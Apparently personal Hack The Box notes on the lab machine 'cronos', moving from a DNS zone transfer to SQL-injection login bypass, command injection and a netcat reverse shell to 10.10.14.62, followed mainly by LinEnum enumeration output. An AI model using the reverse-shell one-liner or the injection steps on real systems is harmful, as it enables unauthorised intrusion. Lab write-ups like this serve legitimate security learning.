Linux Boxes

cronos

  1. nmap
  2. http
    1. vi /etc/hosts
  3. dns xfer (dig)
    1. www.cronos.htb
    2. ns1.cronos.htb
    3. admin.cronos.htb
  4. initial foothold
    1. sqlmap admin.cronos.htb
      1. login.req
      2. sqlmap -r login.req
    2. manual admin.cronos SQL injection
    3. command execution
      1. burp repeater
      2. pentest monkey reverse shell cheat sheet
        1. burp
        2. nc listener
      3. reverse shell
  5. Enumeration
    1. /dev/shm
      1. download LinEnum
      2. run LinEnum
        1. Report
      3. schdeuled laravel owned by root
  6. priv esc with Kernel.php
    1. laravel scheduling task
      1. find app/Console/Kernel.php
      2. Kernel.php
    2. setuid.c
      1. CURL program to cronos
      2. update Kernel.php/ change owner of setuid.c to root
      3. move getuid.c to tmp folder & privesc
      4. root
  7. priv esc with artisan
    1. php-reverse-shell
  8. priv esc with kernel exploit dirty cow
  9. user/root
  10. lessons learned

cronos

images/362-1.png
images/362-2.png

nmap

images/363-1.png+

Services Open
1) 22/tcp ssh <-can ssh into box given credentials
2) 53/tcp dns <- likely going to need to zone xfer
3) 80/tcp http <-box runs a web application we may be able to exploit

http

Get Default page when visiting URL, check burp suite for potential redirect

images/1961-1.png
images/1961-2.png


swap IP address for host: cronos.htb
images/1961-3.png

forward the packet and we see we get redirected to the real cronos http webpage, which means we should update our /etc/hosts file to account for cronos.htb having the ip 10.10.10.13
images/1961-4.png

vi /etc/hosts

lets update our hosts file with vi
images/367-1.png

images/367-2.png

and now test out navigating to cronos.htb
images/367-3.png

dns xfer (dig)

the dig zone transfer command usage is
dig axfr @<IP> <hostname>

images/366-1.png


lets take these newly discovered domain names and edit /etc/hosts file with them
images/366-2.png

images/366-3.png

www.cronos.htb

images/368-1.png

ns1.cronos.htb

images/370-1.png

admin.cronos.htb

images/369-1.png

initial foothold

sqlmap admin.cronos.htb

To use sqlmap, we first need to capture a login request to pass through as an argument

Capture sent login request with Burp Suite
images/365-1.png


images/365-2.png

login.req

copy this login request into vi editor
images/371-1.png
images/371-2.png

sqlmap -r login.req

images/372-1.png



images/372-2.png


Sqlmap gets a redirect to
admin.cronos.htb:80/welcome.php
images/372-3.png


images/372-4.png

Found this out when using USER INJECTION, lets try an sql injection then...
images/372-5.png

manual admin.cronos SQL injection

because there's no proper input sanitation serverside when running sql queries on cronos' backend, placing a single quote ' escapes the
SELECT * from Users where UserName = ‘username’ database query
and allows us to comment out the rest of the authentication query with -- -
bypassing authentication entirely

images/373-1.png


voila! we bypass authenticating with a password
images/373-2.png

command execution

by appending a command after a ; character, we see we can execute server side requests

images/374-1.png

images/374-2.png

images/374-3.png

burp repeater

REMEMBER WE HAVE TO URL-ENCODE the commands we send with ctrl-U

images/376-1.png

Can do RCE through command as well:
images/376-2.png

pentest monkey reverse shell cheat sheet

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.62 1234 >/tmp/f

images/377-1.png

burp

Pre URL-ENCODE

images/378-1.png

Post URL-ENCODE:
images/378-2.png

nc listener

images/379-1.png

reverse shell

images/375-1.png

import tty shell with python:

python -c ‘import pty;pty.spawn("/bin/bash")'
images/375-2.png

For tab auto-complete shell
CNTL+Z to background
stty raw -echo
fg (foreground)
images/375-3.png
type “fg" after and punch the enter key a couple of times

to clear screen capabilites export TERM=screen
images/375-4.png


Enumeration

Next is do have our target dl our enumeration scripts to check for potential vulnerabilities...

images/382-1.png


images/382-2.png

/dev/shm

The /dev/shm directory empties itself and its contents on reboot which is a great place to save attack/enumeration tools
images/383-1.png

download LinEnum

images/384-1.png

run LinEnum

images/381-1.png

the first 4 cron jobs are standard, however the 5th job is not common on linux boxes and is worth looking into

images/381-2.png

Report

-rw-r--r-- 1 root root 907 Jan 19 2017 systemd-resolved.service
-rw-r--r-- 1 root root 696 Jan 19 2017 systemd-rfkill.service
-rw-r--r-- 1 root root 497 Jan 19 2017 systemd-suspend.service
-rw-r--r-- 1 root root 649 Jan 19 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Jan 19 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jan 19 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 598 Jan 19 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 703 Jan 19 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 683 Jan 19 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 823 Jan 19 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 743 Jan 19 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 825 Jan 19 2017 systemd-udevd.service
-rw-r--r-- 1 root root 757 Jan 19 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 754 Jan 19 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 573 Jan 19 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 528 Jan 19 2017 user@.service
-rw-r--r-- 1 root root 403 Jan 19 2017 -.slice
-rw-r--r-- 1 root root 879 Jan 19 2017 basic.target
-rw-r--r-- 1 root root 379 Jan 19 2017 bluetooth.target
-rw-r--r-- 1 root root 358 Jan 19 2017 busnames.target
-rw-r--r-- 1 root root 394 Jan 19 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Jan 19 2017 cryptsetup.target
-rw-r--r-- 1 root root 670 Jan 19 2017 dev-hugepages.mount
-rw-r--r-- 1 root root 624 Jan 19 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 431 Jan 19 2017 emergency.target
-rw-r--r-- 1 root root 501 Jan 19 2017 exit.target
-rw-r--r-- 1 root root 440 Jan 19 2017 final.target
-rw-r--r-- 1 root root 460 Jan 19 2017 getty.target
-rw-r--r-- 1 root root 558 Jan 19 2017 graphical.target
-rw-r--r-- 1 root root 487 Jan 19 2017 halt.target
-rw-r--r-- 1 root root 447 Jan 19 2017 hibernate.target
-rw-r--r-- 1 root root 468 Jan 19 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 553 Jan 19 2017 initrd-fs.target
-rw-r--r-- 1 root root 526 Jan 19 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 691 Jan 19 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Jan 19 2017 initrd.target
-rw-r--r-- 1 root root 501 Jan 19 2017 kexec.target
-rw-r--r-- 1 root root 395 Jan 19 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Jan 19 2017 local-fs.target
-rw-r--r-- 1 root root 405 Jan 19 2017 machine.slice
-rw-r--r-- 1 root root 492 Jan 19 2017 multi-user.target
-rw-r--r-- 1 root root 464 Jan 19 2017 network-online.target
-rw-r--r-- 1 root root 461 Jan 19 2017 network-pre.target
-rw-r--r-- 1 root root 480 Jan 19 2017 network.target
-rw-r--r-- 1 root root 514 Jan 19 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Jan 19 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Jan 19 2017 paths.target
-rw-r--r-- 1 root root 552 Jan 19 2017 poweroff.target
-rw-r--r-- 1 root root 377 Jan 19 2017 printer.target
-rw-r--r-- 1 root root 693 Jan 19 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Jan 19 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 543 Jan 19 2017 reboot.target
-rw-r--r-- 1 root root 396 Jan 19 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 482 Jan 19 2017 remote-fs.target
-rw-r--r-- 1 root root 486 Jan 19 2017 rescue.target
-rw-r--r-- 1 root root 500 Jan 19 2017 rpcbind.target
-rw-r--r-- 1 root root 402 Jan 19 2017 shutdown.target
-rw-r--r-- 1 root root 362 Jan 19 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Jan 19 2017 sleep.target
-rw-r--r-- 1 root root 409 Jan 19 2017 slices.target
-rw-r--r-- 1 root root 380 Jan 19 2017 smartcard.target
-rw-r--r-- 1 root root 356 Jan 19 2017 sockets.target
-rw-r--r-- 1 root root 380 Jan 19 2017 sound.target
-rw-r--r-- 1 root root 441 Jan 19 2017 suspend.target
-rw-r--r-- 1 root root 353 Jan 19 2017 swap.target
-rw-r--r-- 1 root root 715 Jan 19 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 719 Jan 19 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Jan 19 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 518 Jan 19 2017 sysinit.target
-rw-r--r-- 1 root root 1.3K Jan 19 2017 syslog.socket
-rw-r--r-- 1 root root 585 Jan 19 2017 system-update.target
-rw-r--r-- 1 root root 436 Jan 19 2017 system.slice
-rw-r--r-- 1 root root 646 Jan 19 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 574 Jan 19 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 409 Jan 19 2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root 540 Jan 19 2017 systemd-fsckd.socket
-rw-r--r-- 1 root root 524 Jan 19 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 607 Jan 19 2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jan 19 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 842 Jan 19 2017 systemd-journald.socket
-rw-r--r-- 1 root root 591 Jan 19 2017 systemd-networkd.socket
-rw-r--r-- 1 root root 617 Jan 19 2017 systemd-rfkill.socket
-rw-r--r-- 1 root root 450 Jan 19 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 578 Jan 19 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 570 Jan 19 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 395 Jan 19 2017 time-sync.target
-rw-r--r-- 1 root root 405 Jan 19 2017 timers.target
-rw-r--r-- 1 root root 417 Jan 19 2017 umount.target
-rw-r--r-- 1 root root 392 Jan 19 2017 user.slice
-rw-r--r-- 1 root root 663 Jan 18 2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root 153 Jan 17 2017 apt-daily.service
-rw-r--r-- 1 root root 162 Jan 17 2017 apt-daily.timer
-rw-r--r-- 1 root root 342 Jan 13 2017 getty-static.service
-rw-r--r-- 1 root root 153 Jan 13 2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root 152 Jan 13 2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
-rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
-rw-r--r-- 1 root root 189 Dec 16 2016 uuidd.service
-rw-r--r-- 1 root root 126 Dec 16 2016 uuidd.socket
-rw-r--r-- 1 root root 320 Dec 14 2016 unattended-upgrades.service
-rw-r--r-- 1 root root 420 Dec 7 2016 resolvconf.service
-rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
-rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
-rw-r--r-- 1 root root 359 Nov 15 2016 bind9-resolvconf.service
-rw-r--r-- 1 root root 239 Nov 15 2016 bind9.service
-rw-r--r-- 1 root root 350 Nov 15 2016 bind9-pkcs11.service
-rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
-rw-r--r-- 1 root root 251 Sep 18 2016 open-vm-tools.service
-rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
-rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
lrwxrwxrwx 1 root root 27 May 10 2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root 21 May 10 2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 412 May 10 2016 plymouth-halt.service
-rw-r--r-- 1 root root 426 May 10 2016 plymouth-kexec.service
-rw-r--r-- 1 root root 421 May 10 2016 plymouth-poweroff.service
-rw-r--r-- 1 root root 200 May 10 2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root 194 May 10 2016 plymouth-quit.service
-rw-r--r-- 1 root root 244 May 10 2016 plymouth-read-write.service
-rw-r--r-- 1 root root 416 May 10 2016 plymouth-reboot.service
-rw-r--r-- 1 root root 532 May 10 2016 plymouth-start.service
-rw-r--r-- 1 root root 291 May 10 2016 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 May 10 2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 May 10 2016 systemd-ask-password-plymouth.service
-rw-r--r-- 1 root root 385 Apr 28 2016 ssh.service
-rw-r--r-- 1 root root 216 Apr 28 2016 ssh.socket
-rw-r--r-- 1 root root 196 Apr 28 2016 ssh@.service
lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
-rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
-rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
-rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
-rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants
-rw-r--r-- 1 root root 234 Apr 9 2016 acpid.service
-rw-r--r-- 1 root root 251 Apr 6 2016 cron.service
-rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
-rw-r--r-- 1 root root 225 Mar 31 2016 apport-forward.socket
-rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
-rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
-rw-r--r-- 1 root root 115 Feb 10 2016 acpid.socket
-rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
-rw-r--r-- 1 root root 169 Jan 15 2016 atd.service
-rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
-rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
-rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
-rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
-rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10 2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Mar 22 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Mar 22 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 May 10 2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10 2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10 2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Mar 22 2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Mar 22 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Mar 22 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Mar 22 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Mar 22 2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Mar 22 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Mar 22 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Mar 22 2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Mar 22 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Mar 22 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Mar 22 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Mar 22 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Mar 22 2017 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Mar 22 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Mar 22 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Mar 22 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 May 10 2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12 2016 apache2-systemd.conf

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 30 Mar 22 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 25 Mar 22 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Mar 22 2017 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Mar 22 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Mar 22 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Jan 12 2017 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Mar 22 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Jan 12 2017 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Mar 22 2017 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Mar 22 2017 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Mar 22 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Mar 22 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Mar 22 2017 getty-static.service -> ../getty-static.service

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-sleep:
total 4.0K
-rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm

/lib/systemd/system-generators:
total 680K
-rwxr-xr-x 1 root root 59K Jan 19 2017 systemd-dbus1-generator
-rwxr-xr-x 1 root root 71K Jan 19 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 43K Jan 19 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 79K Jan 19 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 119K Jan 19 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 39K Jan 19 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 35K Jan 19 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 31K Jan 19 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Jan 19 2017 systemd-sysv-generator
-rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Jan 19 2017 90-systemd.preset

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Jan 19 2017 80-container-host0.network
-rw-r--r-- 1 root root 482 Jan 19 2017 80-container-ve.network
-rw-r--r-- 1 root root 80 Jan 19 2017 99-default.link

/lib/systemd/system-shutdown:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using EditLine wrapper


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-07-14T12:32:26


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr 9 2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr 9 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr 9 2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd


[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 6 2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry


[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22 2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep 6 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30 2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
